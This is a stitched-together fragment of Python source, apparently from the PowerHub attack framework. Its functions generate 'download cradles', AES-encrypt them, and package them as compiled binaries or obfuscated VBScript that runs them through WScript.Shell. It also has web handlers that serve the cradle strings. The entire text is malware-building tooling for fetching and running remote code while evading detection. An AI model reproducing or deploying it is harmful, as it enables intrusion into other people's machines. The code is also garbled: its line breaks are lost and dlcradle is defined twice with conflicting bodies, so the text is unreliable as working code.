def compile_source(args, source_file, compile_cmd, formatter): filename = create_filename(args) args = dict(args) # convert from immutable dict args['Launcher'] = 'cmd_enc' cmd = build_cradle(args) size = len(cmd) key = generate_random_key(16) cmd = encrypt_aes(cmd.encode(), key) c_code = load_template( source_file, CMD=formatter(cmd), LEN_CMD=size, KEY=key, ) with tempfile.TemporaryDirectory() as tmpdirname: outfile = os.path.join(tmpdirname, 'powerhub.out') infile = os.path.join(tmpdirname, 'powerhub.in') with open(infile, 'w') as f: f.write(c_code) pipe = subprocess.Popen( compile_cmd(outfile) + [infile], stdin=subprocess.PIPE, stdout=subprocess.PIPE, ) out = pipe.communicate() if pipe.returncode == 0: with open(outfile, 'rb') as f: result = f.read() else: raise RuntimeError('Compiling the payload failed, ' 'see console output') log.error('Compiling the payload failed: ' + out) return filename, result
def dlcradle(): try: if request.args['Launcher'] in [ 'powershell', 'cmd', 'cmd_enc', 'bash', ]: cmd = build_cradle(request.args) return render_template( "hub/download-cradle.html", dl_str=cmd, ) else: import urllib href = urllib.parse.urlencode(request.args) return render_template( "hub/download-cradle.html", dl_str=None, href='/dl?' + href, ) except BadRequestKeyError as e: log.error("Unknown key, must be one of %s" % str(list(request.args.keys()))) return (str(e), 500)
def create_vbs(args): filename = create_filename(args) args = dict(args) # convert from immutable dict args['Launcher'] = 'cmd_enc' cmd = build_cradle(args).replace('\n', '') cmd = ('CreateObject("WScript.Shell").' + 'exec("%s")') % cmd key = generate_random_key(16) cmd = encrypt_aes(cmd.encode(), key) vbs_code = load_template( 'powerhub.vbs', HEX_CODE=' '.join('%02X' % c for c in cmd), HEX_KEY=' '.join('%02X' % ord(c) for c in key), symbol_name=symbol_name, ) return filename, vbs_code
def dlcradle(): try: return build_cradle(request.args, flavor=request.args["flavor"]) except BadRequestKeyError as e: log.error("Unknown key, must be one of %s" % str(request.args)) return (str(e), 500)